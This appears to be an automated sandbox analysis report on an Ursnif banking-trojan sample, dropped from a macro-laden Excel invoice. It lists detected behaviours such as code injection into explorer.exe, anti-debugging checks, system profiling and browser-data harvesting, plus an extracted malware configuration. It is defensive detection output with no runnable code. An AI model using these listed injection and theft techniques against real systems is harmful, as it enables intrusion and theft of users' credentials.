Source: C:\ProgramData\sodxnes.exeCode function: 2_2_0560B299 wsprintfA,lstrlenW,WriteFile,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,2_2_0560B299
Contains functionality to query local drivesShow sources
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_05604342 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,2_2_05604342
Enumerates the file systemShow sources
Source: C:\Windows\System32\ie4uinit.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\ie4uinit.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\ie4uinit.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\ie4uinit.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
Source: C:\Windows\System32\ie4uinit.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\ie4uinit.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
Queries a list of all running processesShow sources
Source: C:\Windows\explorer.exeProcess information queried: ProcessInformation

Anti Debugging:

barindex
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)Show sources
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_055FEE8C LdrLoadDll,LdrGetProcedureAddress,NtProtectVirtualMemory,GetModuleHandleA,memcpy,2_2_055FEE8C
Contains functionality to dynamically determine API callsShow sources
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_05609C37 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,2_2_05609C37
Contains functionality to read the PEBShow sources
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_001D092B mov eax, dword ptr fs:[00000030h]2_2_001D092B
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_001D0D90 mov eax, dword ptr fs:[00000030h]2_2_001D0D90
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_00267C7B push dword ptr fs:[00000030h]2_2_00267C7B
Contains functionality to register its own exception handlerShow sources
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_00401B9B InitializeCriticalSection,TlsAlloc,RtlAddVectoredExceptionHandler,GetLastError,2_2_00401B9B
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_001D1DEB RtlInitializeCriticalSection,TlsAlloc,RtlAddVectoredExceptionHandler,GetLastError,2_2_001D1DEB
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_055FD10E StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,2_2_055FD10E

HIPS / PFW / Operating System Protection Evasion:

barindex
Allocates memory in foreign processesShow sources
Source: C:\ProgramData\sodxnes.exeMemory allocated: C:\Windows\explorer.exe base: 710000 protect: page execute and read and writeJump to behavior
Creates a thread in another existing process (thread injection)Show sources
Source: C:\ProgramData\sodxnes.exeThread created: C:\Windows\explorer.exe EIP: 76F3F515Jump to behavior
Injects code into the Windows Explorer (explorer.exe)Show sources
Source: C:\ProgramData\sodxnes.exeMemory written: PID: 1216 base: 76F3F515 value: EBJump to behavior
Source: C:\ProgramData\sodxnes.exeMemory written: PID: 1216 base: 710000 value: 15Jump to behavior
Source: C:\ProgramData\sodxnes.exeMemory written: PID: 1216 base: 76F3F515 value: 8BJump to behavior
Maps a DLL or memory area into another processShow sources
Source: C:\ProgramData\sodxnes.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
Modifies the context of a thread in another process (thread injection)Show sources
Source: C:\ProgramData\sodxnes.exeThread register set: target process: 1216Jump to behavior
Writes to foreign memory regionsShow sources
Source: C:\ProgramData\sodxnes.exeMemory written: C:\Windows\explorer.exe base: 76F3F515Jump to behavior
Source: C:\ProgramData\sodxnes.exeMemory written: C:\Windows\explorer.exe base: 710000Jump to behavior
Source: C:\ProgramData\sodxnes.exeMemory written: C:\Windows\explorer.exe base: 76F3F515Jump to behavior
Yara detected password protected xls with embedded macrosShow sources
Source: Yara matchFile source: fattura_28.xls, type: SAMPLE
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: explorer.exe, 00000014.00000000.1277133124.00970000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: explorer.exe, 00000014.00000000.1277133124.00970000.00000002.00000001.sdmpBinary or memory string: Progman
Source: explorer.exe, 00000014.00000000.1277133124.00970000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000014.00000000.1276986093.0087D000.00000004.00000020.sdmpBinary or memory string: ProgmanpD

Language, Device and Operating System Detection:

barindex
Contains functionality locales information (e.g. system language)Show sources
Source: C:\ProgramData\sodxnes.exeCode function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,__itow_s,2_2_00410C27
Source: C:\ProgramData\sodxnes.exeCode function: __crtGetLocaleInfoA_stat,2_2_00414628
Source: C:\ProgramData\sodxnes.exeCode function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,2_2_00410AC4
Source: C:\ProgramData\sodxnes.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_004106FC
Source: C:\ProgramData\sodxnes.exeCode function: GetLocaleInfoW,_GetPrimaryLen,2_2_00410898
Source: C:\ProgramData\sodxnes.exeCode function: _GetPrimaryLen,EnumSystemLocalesA,2_2_00410BEB
Source: C:\ProgramData\sodxnes.exeCode function: _LcidFromHexString,GetLocaleInfoA,2_2_004107F1
Source: C:\ProgramData\sodxnes.exeCode function: _GetPrimaryLen,EnumSystemLocalesA,2_2_00410B84
Contains functionality to query CPU information (cpuid)Show sources
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_00221341 cpuid 2_2_00221341
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\System32\ie4uinit.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\ie4uinit.exeQueries volume information: C:\Program Files\Internet Explorer\iexplore.exe VolumeInformationJump to behavior
Contains functionality to create pipes for IPCShow sources
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_05604C3A CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,2_2_05604C3A
Contains functionality to query local / system timeShow sources
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_004016D4 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,2_2_004016D4
Contains functionality to query the account / user nameShow sources
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_00221341 GetUserNameW,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,HeapFree,2_2_00221341
Contains functionality to query windows versionShow sources
Source: C:\ProgramData\sodxnes.exeCode function: 2_2_004018A2 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,2_2_004018A2
Queries the cryptographic machine GUIDShow sources
Source: C:\ProgramData\sodxnes.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Overwrites Mozilla Firefox settingsShow sources
Source: C:\Windows\explorer.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\477lumc2.default\prefs.js

Stealing of Sensitive Information:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000002.00000003.1275041455.055C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000002.00000002.1297996198.055F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000002.00000003.1273363449.05F3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: sodxnes.exe PID: 2164, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)Show sources
Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\477lumc2.default\prefs.js

Remote Access Functionality:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000002.00000003.1275041455.055C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000002.00000002.1297996198.055F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000002.00000003.1273363449.05F3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: sodxnes.exe PID: 2164, type: MEMORY

Malware Configuration

Threatname: Ursnif

{"server": "12", "version": "214131", "uptime": "352JJn", "crc": "3", "id": "8585", "user": "be6bfbbc04b2ebbcc45396fdb578e911", "soft": "3"}

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet